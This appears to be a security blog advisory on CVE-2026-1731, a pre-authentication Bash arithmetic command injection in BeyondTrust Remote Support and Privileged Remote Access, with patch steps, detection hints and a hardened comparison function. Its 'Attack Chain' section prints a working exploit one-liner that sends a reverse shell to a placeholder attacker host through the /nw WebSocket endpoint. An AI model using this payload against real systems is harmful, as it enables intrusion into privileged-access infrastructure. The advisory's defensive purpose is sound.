BeyondTrust Gets Hit Again: Pre-Auth RCE in Remote Support Tools

BeyondTrust Remote Support and Privileged Remote Access have a critical pre-authentication RCE bug. No login needed, no user interaction, just send a crafted WebSocket request and you’re executing OS commands as the site user.

This is CVE-2026-1731. CVSS 9.9. And it’s in the exact same endpoint that got exploited by Chinese state actors three months ago.

What Happened

The vulnerability is a command injection in the thin-scc-wrapper script. This script handles WebSocket connections at /nw and reads a version number from the client. The problem? That version number gets used in a Bash arithmetic comparison without proper validation.

When Bash evaluates something like [[ "$localVersion" -lt "$remoteVersion" ]], it treats the operands as arithmetic expressions. An attacker can send a malicious version number like a[$(command)] and Bash will execute whatever’s in that subshell.

Attack Chain

The exploit is straightforward. Connect to the WebSocket endpoint at /nw with the protocol header ingredi support desk customer thin. Send four newline-delimited values: a malicious version number, a UUID for the cookie, an auth type, and a gskey.

The version number is where the injection happens. Format it as a[$(your_command)] and that command runs when the script hits the arithmetic comparison.

The example below uses a Bash reverse shell:

echo -ne "hax[\$(/bin/bash -i >& /dev/tcp/attacker_ip/4444 0>&1)]\naaaaaaaa-aaaa-aaaa-aaaaaaaaaaaa\n0\naaaa\n" | websocat -k wss://target:443/nw --protocol "ingredi support desk customer thin" -H "X-Ns-Company: company_name" --binary -n -

Commands execute in the context of the site user. Full system access follows.

Who Should Care

Anyone running BeyondTrust Remote Support or Privileged Remote Access on-premises. SaaS customers got auto-patched on February 2nd.

There are roughly 8,500 internet-facing on-prem instances that could be vulnerable. BeyondTrust has 20,000+ customers including 75% of the Fortune 100. These tools are deployed in environments that handle privileged access to critical systems.

The attack requires no authentication, no user interaction, and there’s a public PoC. If you’re running an affected version and haven’t patched, you’re exposed.

Why This Happened

This is a Bash arithmetic evaluation bug. The code uses comparison operators like -lt inside [[ ]] without validating that the operands are actually numbers. Bash treats those operands as expressions and evaluates them.

It’s a subtle gotcha. Most developers know to sanitize shell input, but arithmetic evaluation is less obvious. You see what looks like a safe numeric comparison and miss that Bash will execute code embedded in the “number.”
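As an added illustration (not BeyondTrust's code and not the PoC above), here is the comparison pattern the post describes beside a hardened replacement that allow-lists the version string before any arithmetic context sees it. The function names, the version values and the harmless `id` demo payload are constructed for this example.

```bash
#!/usr/bin/env bash
# Added example, not BeyondTrust's code: a comparison in the style the post
# describes, and a hardened replacement. Function names are constructed here.

# VULNERABLE pattern: -lt inside [[ ]] sends both operands through Bash's
# arithmetic evaluator. A "version" such as a[$(cmd)] is parsed as an array
# reference, and the command substitution in the subscript runs.
vulnerable_version_lt() {
    local localVersion="$1" remoteVersion="$2"
    [[ "$localVersion" -lt "$remoteVersion" ]]
}

# Allow-list check: digits optionally separated by dots, nothing else.
# This is the same "non-numeric version value" test a detection rule on the
# /nw handshake would apply.
is_safe_version() {
    [[ "$1" =~ ^[0-9]+(\.[0-9]+)*$ ]]
}

# HARDENED comparison: validate both inputs first (exit status 2 on reject),
# then compare dotted components as base-10 integers. No user-controlled text
# is ever handed to an arithmetic context as an expression.
safe_version_lt() {
    local a="$1" b="$2"
    is_safe_version "$a" && is_safe_version "$b" || return 2
    local -a pa pb
    IFS=. read -r -a pa <<< "$a"
    IFS=. read -r -a pb <<< "$b"
    local i n=$(( ${#pa[@]} > ${#pb[@]} ? ${#pa[@]} : ${#pb[@]} ))
    for (( i = 0; i < n; i++ )); do
        # 10# forces decimal so "08" is not read as octal; missing parts are 0
        local x=$(( 10#${pa[i]:-0} )) y=$(( 10#${pb[i]:-0} ))
        (( x < y )) && return 0
        (( x > y )) && return 1
    done
    return 1   # equal is not less-than
}

# Demo with constructed inputs (harmless `id` stands in for a real payload).
if [[ "${BASH_SOURCE[0]}" == "$0" ]]; then
    safe_version_lt 24.3.4 25.1.1 && echo "24.3.4 < 25.1.1: update needed"
    safe_version_lt 'a[$(id)]' 1 || echo "injection string rejected, rc=$?"
fi
```

The hardened function never lets the raw string reach `[[ -lt ]]` or `(( ))`, so the array-subscript trick has nothing to expand.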

What makes this worse? It’s in the same endpoint as CVE-2024-12356, which Chinese state actors exploited to breach the US Treasury in December. BeyondTrust fixed that bug, but missed this variant sitting right next to it.

The researchers who found this used AI-enabled variant analysis. They discovered it one day after watchTowr published analysis of a similar Bash arithmetic bug in Ivanti EPMM. Pattern recognition at work.

What to Do

Update immediately.

For self-hosted Remote Support:

  1. Log into the appliance interface
  2. Navigate to /appliance
  3. Apply patch BT26-02-RS

For self-hosted Privileged Remote Access:

  1. Log into the appliance interface
  2. Navigate to /appliance
  3. Apply patch BT26-02-PRA
  4. Or upgrade to version 25.1.1 or later

If you’re on Remote Support older than 21.3 or PRA older than 22.1, you need to upgrade to a newer base version first before you can apply the patch.

SaaS customers don’t need to do anything. You were patched on February 2nd.

While you’re patching, review your network segmentation. These tools shouldn’t be directly exposed to the internet. Put them behind a VPN or access control that requires authentication before you even reach the vulnerable endpoint. That doesn’t fix the bug, but it reduces your attack surface until you can patch.

Quick Reference

Item                        Details
CVE ID                      CVE-2026-1731
CVSS Score                  9.9 (v4), 9.8 (v3)
Authentication Required     None
User Interaction Required   None
Attack Complexity           Low
Products Affected           Remote Support 25.3.1 and earlier, PRA 24.3.4 and earlier
Fixed Versions              RS: Patch BT26-02-RS, PRA 25.1.1+
Public PoC                  Yes
Active Exploitation         Not reported as of Feb 12, 2026
Patch Availability          Yes (BT26-02-RS, BT26-02-PRA)

FAQ

Q: Is this being exploited in the wild?
A: Not as of February 12, 2026. BeyondTrust and security researchers report no active exploitation. But there’s a public PoC and it’s easy to exploit, so assume that window is closing fast.

Q: How is this different from CVE-2024-12356?
A: Different vulnerability, same endpoint. CVE-2024-12356 was exploited as a zero-day by Chinese state actors. CVE-2026-1731 was found through responsible disclosure and patched before exploitation. But both allow pre-auth RCE through the same WebSocket handler.

Q: Do I need to upgrade or can I just patch?
A: You can patch if you’re on RS 21.3+ or PRA 22.1+. Older versions need to upgrade to a supported base version first.

Q: What privileges does the attacker get?
A: Commands execute in the context of the site user. That’s typically a privileged account with access to the system and potentially to connected endpoints.

Q: Can I detect exploitation attempts?
A: Look for WebSocket connections to /nw with unusual version numbers in the protocol handshake. Connections with non-numeric version values or values containing shell metacharacters are suspicious. Monitor for unexpected child processes spawned by the thin-scc-wrapper script.

Q: I’m on SaaS. Am I affected?
A: No. SaaS instances were automatically patched on February 2, 2026. This only affects self-hosted deployments that haven’t applied the patch.

Why This Matters

BeyondTrust tools are high-value targets. They provide privileged access to critical systems across enterprise networks. When they get compromised, attackers land directly in the keys to the kingdom.

This is the second major pre-auth RCE in these products in three months. The first was exploited to breach the US Treasury. The fact that this new bug is in the same endpoint suggests the fix for CVE-2024-12356 wasn’t comprehensive enough.

Variant analysis is finding these bugs. Researchers are using pattern matching to identify similar vulnerabilities across different codebases. The Ivanti bug that used Bash arithmetic evaluation got published, and a day later this BeyondTrust bug was discovered using the same technique.

If you’re maintaining code that does shell arithmetic with user input, audit it now. This isn’t just a BeyondTrust problem. It’s a pattern, and attackers are learning to look for it.

Bottom Line

CVE-2026-1731 is a critical pre-auth RCE in widely deployed enterprise tools. No authentication, no user interaction, straightforward exploitation, public PoC. If you’re running on-prem Remote Support or PRA, patch immediately. SaaS customers are already covered.

Don’t wait for exploitation to be reported. The Chinese actors who hit CVE-2024-12356 demonstrated these tools are strategic targets. Update today.
